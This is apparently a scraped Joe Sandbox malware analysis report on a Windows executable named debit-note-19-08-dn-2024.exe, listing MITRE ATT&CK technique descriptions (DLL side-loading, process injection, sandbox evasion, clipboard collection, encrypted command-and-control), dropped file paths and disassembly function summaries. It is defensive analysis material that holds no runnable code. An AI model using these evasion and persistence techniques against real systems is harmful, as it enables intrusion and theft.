Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report debit-note-19-08-dn-2024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\App.ini

C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsc47EB.tmp

C:\Users\user\AppData\Local\Temp\tmc.ini

C:\Users\user\brugerlicensaftalerne\Anam.Tra

C:\Users\user\brugerlicensaftalerne\Isidora\gaadefulde.txt

C:\Users\user\brugerlicensaftalerne\Isidora\mininetwork.bil

C:\Users\user\brugerlicensaftalerne\Photostatting.bak

C:\Users\user\brugerlicensaftalerne\armless.ude

C:\Users\user\brugerlicensaftalerne\buxus.bog

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
debit-note-19-08-dn-2024.exe

Function 0040335A Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 383
stringfilecomCOMMON

Function 00405331 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405F6A Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207
stringCOMMON

Function 004057D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00403CC2 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 0040391F Relevance: 52.7, APIs: 16, Strings: 14, Instructions: 216
stringregistrylibraryCOMMON

Function 00402DBC Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142
fileCOMMON

Function 004051F2 Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Function 00402331 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Function 00405E15 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON